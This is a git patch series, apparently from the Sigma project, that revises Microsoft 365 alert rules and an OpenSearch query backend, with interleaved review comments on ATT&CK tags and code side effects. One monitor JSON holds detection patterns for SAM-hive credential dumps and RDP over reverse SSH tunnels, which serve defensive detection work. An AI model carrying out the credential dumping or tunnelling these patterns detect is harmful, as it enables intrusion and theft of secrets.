a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Activity from infrequent country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. author: Austin Songer @austinsonger date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatManagement service: m365 detection: selection: 
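Review bot: `attack.t1573` (Encrypted Channel) in the new file's tags does not describe this alert; a sign-in from an anonymizer is `- attack.t1090.003` (Proxy: Multi-hop Proxy) if you keep `attack.command_and_control`, and the practical finding, a cloud account used from an anonymous proxy, is closer to `- attack.initial_access` with `- attack.t1078.004`. The `falsepositives` entry `User using a VPN or Proxy` is the right caveat and is also the reason not to raise the level above medium. `eventName` is matched against the product's display string `"Activity from anonymous IP addresses"`, so a comment noting that the rule depends on that exact policy title would save the next person from "tidying" it and silently breaking the match.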
@@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 36f5e305..4ade854a 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,14 +1,14 @@ title: Microsoft 365 - Activity from suspicious IP addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental -description: Detects when a Microsoft Cloud App Security reported +description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. author: Austin Songer @austinsonger date: 2021/08/23 references: - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference logsource: - category: + category: ThreatDetection service: m365 detection: selection: @@ -17,8 +17,8 @@ detection: status: success condition: selection falsepositives: - - + - Unknown level: medium tags: - - attack.initial_access - - \ No newline at end of file + - attack.command_and_control + - attack.t1573 \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 91cbe32c..906cd100 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml 
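Review bot: `attack.t1573` is reused for the suspicious-IP rule here (and for the infrequent-country rule in the hunk above), but Encrypted Channel is a C2 technique for the adversary's own traffic, not a description of a user acting from a risky address; both rules are really "possibly compromised account", which `- attack.initial_access` with `- attack.t1078.004` captures. More concretely, the first suspicious-IP hunk sets `category: ThreatDetection` while every sibling rule in this change uses `ThreatManagement`; unless the two categories are intentionally different, one of them will not be picked up by the same logsource mapping, so I would align it to `category: ThreatManagement`.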
@@ -20,4 +20,5 @@ falsepositives: - Unknown level: medium tags: - - attack.exfiltration \ No newline at end of file + - attack.exfiltration + \ No newline at end of file From 53482b7e9cb9d2fc05f5de477d0463cebd93074b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:19:41 +0000 Subject: [PATCH 0533/1367] Update --- ...crosoft365_activity_by_terminated_user.yml | 2 +- ...5_activity_from_anonymous_ip_addresses.yml | 2 +- ...ft365_activity_from_infrequent_country.yml | 2 +- ...icrosoft365_activity_from_ip_addresses.yml | 24 ------------------- ...rosoft365_from_suspicious_ip_addresses.yml | 2 +- ...crosoft365_suspicious_inbox_forwarding.yml | 2 +- ...ous_oauth_app_file_download_activities.yml | 1 - 7 files changed, 5 insertions(+), 30 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 037dcd00..5b2e2df9 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml @@ -20,4 +20,4 @@ falsepositives: - Unknown level: medium tags: - - attack.impact \ No newline at end of file + - attack.impact diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index 697d6f8d..a46219e1 100644 --- a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 8e155919..3d7862fa 100644 
--- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml deleted file mode 100644 index ac34cd56..00000000 --- a/rules/cloud/m365/microsoft365_activity_from_ip_addresses.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Microsoft 365 - Activity from anonymous IP addresses -id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 -status: experimental -description: Detects when a Microsoft Cloud App Security reported -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Activity from anonymous IP addresses" - status: success - condition: selection -falsepositives: - - -level: medium -tags: - - attack.initial_access - - \ No newline at end of file diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 4ade854a..8c703557 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -21,4 +21,4 @@ falsepositives: level: medium tags: - attack.command_and_control - - attack.t1573 \ No newline at end of file + - attack.t1573 diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index e583f123..7910c62c 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml 
+++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -21,4 +21,4 @@ falsepositives: level: low tags: - attack.exfiltration - - attack.t1020 \ No newline at end of file + - attack.t1020 diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 906cd100..3ba0e326 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -21,4 +21,3 @@ falsepositives: level: medium tags: - attack.exfiltration - \ No newline at end of file From 84944cf84965ecba07daf0e7e50ca7cc60830443 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:30:11 +0000 Subject: [PATCH 0534/1367] Update --- rules/cloud/m365/microsoft365_activity_by_terminated_user.yml | 2 +- .../m365/microsoft365_activity_from_anonymous_ip_addresses.yml | 2 +- .../m365/microsoft365_activity_from_infrequent_country.yml | 2 +- .../m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml | 2 +- rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml | 2 +- rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml | 2 +- rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml | 2 +- ...crosoft365_suspicious_oauth_app_file_download_activities.yml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml index 5b2e2df9..738af6e9 100644 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml 
@@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity performed by terminated user +title: Activity performed by terminated user id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee status: experimental description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml index a46219e1..cf1cb871 100644 --- a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from anonymous IP addresses +title: Activity from anonymous IP addresses id: d8b0a4fe-07a8-41be-bd39-b14afa025d95 status: experimental description: Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml index 3d7862fa..9c8a433f 100644 --- a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml +++ b/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from infrequent country +title: Activity from infrequent country id: 0f2468a2-5055-4212-a368-7321198ee706 status: experimental description: Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. 
diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml index a758f328..09256f6a 100644 --- a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml +++ b/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 Data exfiltration to unsanctioned apps +title: Data exfiltration to unsanctioned apps id: 2b669496-d215-47d8-bd9a-f4a45bf07cda status: experimental description: Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml index 8c703557..1714b0cd 100644 --- a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml +++ b/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Activity from suspicious IP addresses +title: Activity from suspicious IP addresses id: a3501e8e-af9e-43c6-8cd6-9360bdaae498 status: experimental description: Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml index f841b3dd..99950ddc 100644 --- a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml +++ b/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml 
@@ -1,4 +1,4 @@ -title: Microsoft 365 Log on from a risky IP address +title: Logon from a risky IP address id: c191e2fa-f9d6-4ccf-82af-4f2aba08359f status: experimental description: Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml index 7910c62c..5975e8b3 100644 --- a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml +++ b/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Suspicious inbox forwarding +title: Suspicious inbox forwarding id: 6c220477-0b5b-4b25-bb90-66183b4089e8 status: experimental description: Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml index 3ba0e326..29944ff4 100644 --- a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml +++ b/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml @@ -1,4 +1,4 @@ -title: Microsoft 365 - Suspicious OAuth app file download activities +title: Suspicious OAuth app file download activities id: ee111937-1fe7-40f0-962a-0eb44d57d174 status: experimental description: Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. From ad892eb239f10cafd6634c4fa6c17c9439391506 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Mon, 23 Aug 2021 22:46:37 +0000 Subject: [PATCH 0535/1367] Update --- .../m365/m365_activity_by_terminated_user.yml | 23 +++++++++++++++++++ ..._activity_from_anonymous_ip_addresses.yml} | 0 ...m365_activity_from_infrequent_country.yml} | 0 ...data_exfiltration_to_unsanctioned_app.yml} | 0 ... => m365_from_suspicious_ip_addresses.yml} | 0 ...l => m365_logon_from_risky_ip_address.yml} | 0 ...l => m365_suspicious_inbox_forwarding.yml} | 0 ...us_oauth_app_file_download_activities.yml} | 0 8 files changed, 23 insertions(+) create mode 100644 rules/cloud/m365/m365_activity_by_terminated_user.yml rename rules/cloud/m365/{microsoft365_activity_from_anonymous_ip_addresses.yml => m365_activity_from_anonymous_ip_addresses.yml} (100%) rename rules/cloud/m365/{microsoft365_activity_from_infrequent_country.yml => m365_activity_from_infrequent_country.yml} (100%) rename rules/cloud/m365/{microsoft365_data_exfiltration_to_unsanctioned_app.yml => m365_data_exfiltration_to_unsanctioned_app.yml} (100%) rename rules/cloud/m365/{microsoft365_from_suspicious_ip_addresses.yml => m365_from_suspicious_ip_addresses.yml} (100%) rename rules/cloud/m365/{microsoft365_logon_from_risky_ip_address.yml => m365_logon_from_risky_ip_address.yml} (100%) rename rules/cloud/m365/{microsoft365_suspicious_inbox_forwarding.yml => m365_suspicious_inbox_forwarding.yml} (100%) rename rules/cloud/m365/{microsoft365_suspicious_oauth_app_file_download_activities.yml => m365_suspicious_oauth_app_file_download_activities.yml} (100%) diff --git a/rules/cloud/m365/m365_activity_by_terminated_user.yml b/rules/cloud/m365/m365_activity_by_terminated_user.yml new file mode 100644 index 00000000..738af6e9 --- /dev/null +++ b/rules/cloud/m365/m365_activity_by_terminated_user.yml 
@@ -0,0 +1,23 @@ +title: Activity performed by terminated user +id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee +status: experimental +description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. +author: Austin Songer @austinsonger +date: 2021/08/23 +references: + - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy + - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference +logsource: + category: ThreatManagement + service: m365 +detection: + selection: + eventSource: SecurityComplianceCenter + eventName: "Activity performed by terminated user" + status: success + condition: selection +falsepositives: + - Unknown +level: medium +tags: + - attack.impact diff --git a/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml b/rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml similarity index 100% rename from rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml rename to rules/cloud/m365/m365_activity_from_anonymous_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml b/rules/cloud/m365/m365_activity_from_infrequent_country.yml similarity index 100% rename from rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml rename to rules/cloud/m365/m365_activity_from_infrequent_country.yml diff --git a/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml b/rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml similarity index 100% rename from rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml rename to rules/cloud/m365/m365_data_exfiltration_to_unsanctioned_app.yml 
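Review bot: This hunk creates `m365_activity_by_terminated_user.yml` as a new file with `id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee`, while the diffstat shows the seven sibling rules were moved with `rename` and the old `microsoft365_activity_by_terminated_user.yml` is only deleted in the following commit; at this commit the tree therefore holds two rules with the same UUID, which any unique-id check would reject if the commit is bisected or cherry-picked alone. Doing it as a rename like the others keeps history and avoids the duplicate. The `attack.impact` tag is carried over unchanged; a terminated account still operating is Valid Accounts, so this is a good moment to change it to `- attack.persistence` / `- attack.t1078.004`.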
diff --git a/rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml b/rules/cloud/m365/m365_from_suspicious_ip_addresses.yml similarity index 100% rename from rules/cloud/m365/microsoft365_from_suspicious_ip_addresses.yml rename to rules/cloud/m365/m365_from_suspicious_ip_addresses.yml diff --git a/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml b/rules/cloud/m365/m365_logon_from_risky_ip_address.yml similarity index 100% rename from rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml rename to rules/cloud/m365/m365_logon_from_risky_ip_address.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml b/rules/cloud/m365/m365_suspicious_inbox_forwarding.yml similarity index 100% rename from rules/cloud/m365/microsoft365_suspicious_inbox_forwarding.yml rename to rules/cloud/m365/m365_suspicious_inbox_forwarding.yml diff --git a/rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml b/rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml similarity index 100% rename from rules/cloud/m365/microsoft365_suspicious_oauth_app_file_download_activities.yml rename to rules/cloud/m365/m365_suspicious_oauth_app_file_download_activities.yml From 29e1ce7e8f32f85584432f023b9a44747e40a330 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 23 Aug 2021 22:50:39 +0000 Subject: [PATCH 0536/1367] Update --- ...crosoft365_activity_by_terminated_user.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/m365/microsoft365_activity_by_terminated_user.yml diff --git a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml b/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml deleted file mode 100644 index 738af6e9..00000000 --- a/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml +++ /dev/null 
@@ -1,23 +0,0 @@ -title: Activity performed by terminated user -id: 2e669ed8-742e-4fe5-b3c4-5a59b486c2ee -status: experimental -description: Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. -author: Austin Songer @austinsonger -date: 2021/08/23 -references: - - https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy - - https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference -logsource: - category: ThreatManagement - service: m365 -detection: - selection: - eventSource: SecurityComplianceCenter - eventName: "Activity performed by terminated user" - status: success - condition: selection -falsepositives: - - Unknown -level: medium -tags: - - attack.impact From d1c7ee0830a3f988078161d0aac2f0ba3da490b3 Mon Sep 17 00:00:00 2001 From: Young Date: Mon, 23 Aug 2021 15:53:43 -0700 Subject: [PATCH 0537/1367] cleaned up backend class and re-added support for threshold rules --- tools/osMonitor.json | 2 +- tools/sigma/backends/base.py | 17 +++--- tools/sigma/backends/opensearch.py | 60 +++++++++---------- tools/sigma/sigmac.py | 93 ++++++++++++++++++++---------- 4 files changed, 104 insertions(+), 68 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index f6839a71..1bc384ef 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json 
@@ -1 +1 @@ -{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}, {"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], "query": {"size": 1, "aggregations": {}, "query": {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.channel": "\"Security\""}}]}}, {"bool": 
{"must": [{"match": {"winlog.event_id": "\"5156\""}}]}}, {"bool": {"should": [{"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.SourcePort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.DestAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.DestAddress.keyword": "\\:\\:1"}}]}}]}}, {"bool": {"must": [{"bool": {"must": [{"match": {"winlog.event_data.DestPort": "\"3389\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.SourceAddress.keyword": "127.*"}}, {"match": {"winlog.event_data.SourceAddress.keyword": "\\:\\:1"}}]}}]}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index 91d2bf1b..cb887d0a 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -27,7 +27,6 @@ from sigma.parser.modifiers.base import SigmaTypeModifier class BackendOptions(dict): """ Object containing all the options that should be passed to the backend. - The options can come from command line and a YAML configuration file, and will be merged together. Options from the command line take precedence. """ 
@@ -44,7 +43,6 @@ class BackendOptions(dict): def _parse_options(self, options): """ Populates options from the unparsed options of the CLI - :param options: list unparsed options from the CLI. Each option can have one of the following formats: - "key=value": the option key:value will be passed to the backend @@ -65,7 +63,6 @@ class BackendOptions(dict): def _load_config_file(self, path): """ Populates options from a configuration file - :param path: Path to the configuration file """ if path is None: @@ -117,7 +114,6 @@ class BaseBackend: if len(sigmaparser.condparsed) > 1: raise NotImplementedError("Base backend doesn't support multiple conditions") for parsed in sigmaparser.condparsed: - print(f'\nParsed: {parsed}\n') query = self.generateQuery(parsed) before = self.generateBefore(parsed) after = self.generateAfter(parsed) @@ -134,7 +130,6 @@ class BaseBackend: def generateQuery(self, parsed): result = self.generateNode(parsed.parsedSearch) - print(f'\nResult: {result}\n') if parsed.parsedAgg: result += self.generateAggregation(parsed.parsedAgg) #result = self.applyOverrides(result) @@ -279,6 +274,10 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateSubexpressionNode(self, node): generated = self.generateNode(node.items) + if 'len'in dir(node.items): # fix the "TypeError: object of type 'NodeSubexpression' has no len()" + if len(node.items) == 1: + # A sub expression with length 1 is not a proper sub expression, no self.subExpression required + return generated if generated: return self.subExpression % generated else: 
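Review bot: `'len'in dir(node.items)` is an unusual and comparatively expensive way to ask whether the node is sized; `hasattr(node.items, "__len__")` says the same thing without building the full attribute list for every subexpression, and the missing space before `in` will trip linters. More importantly this is `SingleTextQueryBackend` in base.py, so dropping the `self.subExpression` wrapper for one-item subexpressions changes the output of every text backend that inherits it, not only the OpenSearch backend this commit is about; expected-output tests for those backends may need updating and the commit message should say so. I would also replace the comment that quotes the exception with one that says what is being handled, e.g. `# node.items may be an unsized NodeSubexpression; only sized one-item lists skip the wrapper`.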
@@ -287,7 +286,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): def generateListNode(self, node): if not set([type(value) for value in node]).issubset({str, int}): raise TypeError("List values must be strings or numbers") - return self.listExpression % (self.listSeparator.join([self.generateNode(value) for value in node])) + result = [self.generateNode(value) for value in node] + if len(result) == 1: + # A list with length 1 is not a proper list, no self.listExpression required + return result[0] + return self.listExpression % (self.listSeparator.join(result)) def generateMapItemNode(self, node): fieldname, value = node @@ -331,4 +334,4 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): in addition to the field mapping defined in the conversion configuration. The field name passed to this method was already transformed from the original name given in the Sigma rule. """ - return fieldname + return fieldname \ No newline at end of file diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 73d3362f..b89c9130 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py 
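Review bot: Returning `result[0]` for a one-element list skips `self.listExpression`, which in `SingleTextQueryBackend` is a backend-supplied template; if any subclass relies on that wrapper for syntax (an `IN (...)`-style `mapListValueExpression`, for instance) a single-value list now renders without its delimiters. Worth checking the subclasses before merging, or confining the shortcut to the Elasticsearch/OpenSearch backends where `field:(value)` and `field:value` are equivalent. Unrelated but visible: the last hunk removes the trailing newline from base.py (`\ No newline at end of file`), which most editors and linters will re-add, so it will churn in the next unrelated change.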
@@ -16,23 +16,13 @@ import json import re -from fnmatch import fnmatch import sys import os -from random import randrange -from distutils.util import strtobool from typing import List, Tuple, Union from uuid import uuid4 -import sigma -import yaml -from sigma.parser.modifiers.type import SigmaRegularExpressionModifier, SigmaTypeModifier -from sigma.parser.condition import ConditionOR, ConditionAND, NodeSubexpression, SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer +from sigma.parser.condition import SigmaAggregationParser -from sigma.config.mapping import ConditionalFieldMapping -from .base import BaseBackend, SingleTextQueryBackend -from .mixins import RulenameCommentMixin, MultiRuleOutputMixin -from .exceptions import NotSupportedError from .elasticsearch import ElasticsearchQuerystringBackend from .defaultOpensearchValues import * @@ -72,10 +62,15 @@ def parse_atom(s: str) -> Atom: reg = r"(? Group: return Group(parse_ary(s[1:-1])) +''' +Expand special group in form of A:(B OR C) to (A:B OR A:C) +''' def expand_group(s: str) -> str: reg = r"(? dict: return translate_group(boolean.expression) -# Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs +''' +Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs. +''' def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> List[List[Boolean]]: result = [[bool1]] resultIndex = 0 @@ -171,6 +168,9 @@ def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> Li return result +''' +Wraps match statements inside bool-must statement. +''' def adjust_matches(matches: List[dict]) -> List[dict]: for index in range(len(matches)): match = matches[index] @@ -191,7 +191,6 @@ def contains_group(booleanArr: List[Boolean]) -> bool: def translate_ary(ary: Ary) -> dict: parsedTranslation = convert_bool_array(ary.bool1, ary.bool2) - # print(f'ParsedTranslation: {parsedTranslation}') clauses = [] 
